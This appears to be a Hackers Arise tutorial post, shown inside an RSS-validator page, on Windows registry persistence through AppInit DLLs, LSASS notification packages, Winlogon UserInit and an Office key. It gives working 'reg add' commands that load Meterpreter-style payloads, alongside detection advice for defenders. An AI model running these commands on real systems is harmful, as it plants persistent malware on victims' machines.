Persistence on Windows systems has always been a cat-and-mouse game between attackers looking for reliable footholds and defenders trying to close down avenues of abuse. Windows itself provides a wide range of mechanisms that are legitimate parts of system functionality, yet each of them can be turned into a way of ensuring malicious code runs again and again after reboot or logon. Registry values, system processes, and initialization routines are all potential targets for persistence, and while most of them were never designed with security in mind, they remain available today. What makes them attractive is durability: once configured, they survive restarts and provide repeated execution opportunities without requiring the attacker to manually re-enter the environment.
The techniques described here are all examples of registry-based persistence, each with its own advantages, drawbacks, and detection footprints. Understanding them is crucial for both attackers– who rely on stability– and defenders– who need to spot tampering before it causes damage.
<h2 class="wp-block-heading">AppInit</h2>
AppInit is a legacy Windows feature that tells the OS loader to map one or more DLLs into any process that links user32.dll. That means when many GUI apps start, Windows will automatically load the DLLs listed in that registry value, giving whatever code is inside those DLLs a chance to run inside those processes. It’s a registry-based, machine-wide mechanism that survives reboot and affects both 32-bit and 64-bit GUI applications when configured.
<code>cmd#> reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t reg_dword /d 0x1 /f</code>
<code>cmd#> reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t reg_sz /d "C:\meter64.dll" /f</code>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="970" height="174" src="https://hackers-arise.com/wp-content/uploads/2025/09/1-appinit-persistence-technique.webp" alt="AppInit windows persistence technique" class="wp-image-17879" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/1-appinit-persistence-technique.webp 970w, https://hackers-arise.com/wp-content/uploads/2025/09/1-appinit-persistence-technique-300x54.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/1-appinit-persistence-technique-768x138.webp 768w" sizes="(max-width: 970px) 100vw, 970px" /></figure>
<code>cmd#> reg add "HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t reg_dword /d 0x1 /f</code>
<code>cmd#> reg add "HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t reg_sz /d "C:\meter32.dll" /f</code>
The first command turns the AppInit behavior on for the 64-bit registry view. The second command writes the path to the DLL(s) that Windows should try to load into GUI processes (this value is a string of one or more DLL paths). The next two commands do the same thing for the 32-bit registry view on a 64-bit system. First it will enable the mechanism for 32-bit processes, and then set the 32-bit DLL path.
In plain terms: enable AppInit, tell Windows which DLLs to load, and do it for both 64-bit and 32-bit processes so GUI apps of both architectures will load the specified libraries.
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="997" height="144" src="https://hackers-arise.com/wp-content/uploads/2025/09/2-appinit-persistence-connection-received.webp" alt="AppInit persistence initiated a connection back" class="wp-image-17880" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/2-appinit-persistence-connection-received.webp 997w, https://hackers-arise.com/wp-content/uploads/2025/09/2-appinit-persistence-connection-received-300x43.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/2-appinit-persistence-connection-received-768x111.webp 768w" sizes="(max-width: 997px) 100vw, 997px" /></figure>
Pros: survives reboots and causes the DLL to be loaded into many GUI processes automatically, giving broad coverage without per-user startup entries.
Cons: requires administrative rights to change HKLM, is noisy because the DLL will appear loaded in many processes (creating strong telemetry), and relies on an older, well-known mechanism that defenders often check.
If you’re a defender, focus on auditing the HKLM Windows keys (including the Wow6432Node path) and monitoring unusual DLL loads into system or common GUI processes.
<h2 class="wp-block-heading">LSASS</h2>
Modifying LSASS’s configuration to load an extra DLL is a way to get code executed inside a highly privileged, long-lived system process. LSASS is responsible for enforcing security policy and handling credentials. Because it loads configured authentication/notification packages at startup, adding an entry here causes the chosen module to be loaded into that process and remain active across reboots. That makes it powerful, but dangerous.
<code>cmd#> reg add "HKLM\system\currentcontrolset\control\lsa" /v "Notification Packages" /t reg_multi_sz /d "rassfm\0scecli\0meter" /f</code>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="961" height="116" src="https://hackers-arise.com/wp-content/uploads/2025/09/3-lsass-persistence-technique.webp" alt="LSASS windows peristence technique" class="wp-image-17881" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/3-lsass-persistence-technique.webp 961w, https://hackers-arise.com/wp-content/uploads/2025/09/3-lsass-persistence-technique-300x36.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/3-lsass-persistence-technique-768x93.webp 768w" sizes="(max-width: 961px) 100vw, 961px" /></figure>
The registry command updates Notification Packages multi-string under the LSA key. In simple terms, this line tells Windows “when LSASS starts, also load the packages named <code>rassfm</code>, <code>scecli</code>, <code>meter</code> and force the write if the value already exists.”
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="903" height="142" src="https://hackers-arise.com/wp-content/uploads/2025/09/4-lsass-connection-received-1.webp" alt="LSASS persistence initiated a connection back" class="wp-image-17888" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/4-lsass-connection-received-1.webp 903w, https://hackers-arise.com/wp-content/uploads/2025/09/4-lsass-connection-received-1-300x47.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/4-lsass-connection-received-1-768x121.webp 768w" sizes="(max-width: 903px) 100vw, 903px" /></figure>
Pros: survives reboots and places code inside a long-running, high-privilege process, making the persistence both durable and powerful.
Cons: requires administrative privileges to change the LSA registry, produces extremely high-risk telemetry and stability impact (misconfiguration or a buggy module can crash LSASS and destabilize or render the system unusable), and it is highly suspicious to defenders.
Putting code into LSASS buys durability and access to sensitive material, but it is one of the loudest and riskiest persistence techniques: it demands admin rights, creates strong signals for detection, and can crash the machine if done incorrectly.
<h2 class="wp-block-heading">Winlogon</h2>
Winlogon is the component that handles interactive user logons, and it calls the program(s) listed in the <code>UserInit</code> registry value after authentication completes. By appending an additional executable to that <code>UserInit</code> string you ensure your program is launched automatically every time someone signs in interactively. 
<code>cmd#> reg add "HKLM\software\microsoft\windows nt\currentversion\winlogon" /v UserInit /t reg_sz /d "c:\windows\system32\userinit.exe, c:\meter.exe"</code>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="970" height="192" src="https://hackers-arise.com/wp-content/uploads/2025/09/5-winlogon-persistence-technique.webp" alt="Winlogon persistence technique" class="wp-image-17884" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/5-winlogon-persistence-technique.webp 970w, https://hackers-arise.com/wp-content/uploads/2025/09/5-winlogon-persistence-technique-300x59.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/5-winlogon-persistence-technique-768x152.webp 768w" sizes="(max-width: 970px) 100vw, 970px" /></figure>
This keeps the normal <code>userinit.exe</code> first and appends <code>c:\meter.exe</code>, so when Winlogon runs it will launch <code>userinit.exe</code> and then <code>meter.exe</code> as part of the logon sequence. Be aware that <code>UserInit</code> must include the legitimate <code>userinit.exe</code> path first. Removing or misordering it can break interactive logons and lock users out.
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="139" src="https://hackers-arise.com/wp-content/uploads/2025/09/6-winlogon-persistence-connection-received-1024x139.webp" alt="Winlogon persistence initiated a connection back" class="wp-image-17885" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/6-winlogon-persistence-connection-received-1024x139.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/09/6-winlogon-persistence-connection-received-300x41.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/6-winlogon-persistence-connection-received-768x104.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/09/6-winlogon-persistence-connection-received.webp 1064w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
Pros: survives reboots and reliably executes at every interactive user logon, giving consistent persistence across sessions.
Cons: requires administrative privileges to change HKLM, offers no scheduling control (it only runs at logon), and is risky, since misconfiguring the UserInit value can prevent users from logging in and produces obvious forensic signals.
<h2 class="wp-block-heading">Microsoft Office</h2>
Many Office components read configuration from the current user’s registry hive, and attackers can abuse that by inserting a path or DLL name that Office will load or reference when the user runs the suite. This approach is per-user and survives reboots because the configuration is stored in HKCU, but it only triggers when the victim actually launches the Office component that reads that key. It’s useful when the target regularly uses Office and you want a simple, low-privilege persistence mechanism that doesn’t require installing a service or touching machine-wide autoruns.
<code>cmd$> reg add "HKCU\Software\Microsoft\Office test\Special\Perf" /t REG_SZ /d C:\meter.dll</code>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="795" height="140" src="https://hackers-arise.com/wp-content/uploads/2025/09/7-office-persistence-technique.webp" alt="Microsoft Office windows persistence technique" class="wp-image-17886" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/7-office-persistence-technique.webp 795w, https://hackers-arise.com/wp-content/uploads/2025/09/7-office-persistence-technique-300x53.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/7-office-persistence-technique-768x135.webp 768w" sizes="(max-width: 795px) 100vw, 795px" /></figure>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="903" height="171" src="https://hackers-arise.com/wp-content/uploads/2025/09/8-office-persistence-connection-received.webp" alt="Microsoft Office persistence initiated a connection back" class="wp-image-17887" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/8-office-persistence-connection-received.webp 903w, https://hackers-arise.com/wp-content/uploads/2025/09/8-office-persistence-connection-received-300x57.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/8-office-persistence-connection-received-768x145.webp 768w" sizes="(max-width: 903px) 100vw, 903px" /></figure>
Pros: survives reboots and works from a normal user account because it lives in HKCU, so no administrative rights are required.
Cons: there’s no scheduling control, it only triggers when the user launches the relevant Office component, so you cannot control an execution interval.
<h2 class="wp-block-heading">Summary</h2>
Windows persistence through registry modifications offers multiple paths, from legacy AppInit DLL injection to LSASS notification packages, Winlogon UserInit hijacking, and Office registry keys under HKCU. Each of these methods survives reboots, ensuring repeated code execution, but they vary in scope and stealth. AppInit and Office rely on application startup, while LSASS and Winlogon provide broader and more privileged coverage. All require different levels of access, with the most powerful options also being the loudest in telemetry and the riskiest to system stability. For defenders, the key takeaway is clear: monitoring critical registry keys under HKLM and HKCU, watching for unusual DLL or executable loads, and ensuring proper auditing are essential.The post <a href="https://hackers-arise.com/advanced-windows-persistence-part-2-using-the-registry-to-maintain-persistence/">Advanced Windows Persistence, Part 2: Using the Registry to Maintain Persistence</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></content:encoded>
</item>
</channel>
</rss>

If you would like to create a banner that links to this page (i.e. this validation result), do the following:

Download the "valid RSS" banner.
Upload the image to your own server. (This step is important. Please do not link directly to the image on this server.)
Add this HTML to your page (change the image src attribute if necessary):

<a href="http://www.feedvalidator.org/check.cgi?url=https%3A//www.hackers-arise.com/blog-feed.xml"><img src="valid-rss-rogers.png" alt="[Valid RSS]" title="Validate my RSS feed" /></a>

If you would like to create a text link instead, here is the URL you can use:

http://www.feedvalidator.org/check.cgi?url=https%3A//www.hackers-arise.com/blog-feed.xml

Home · About · News · Docs · Terms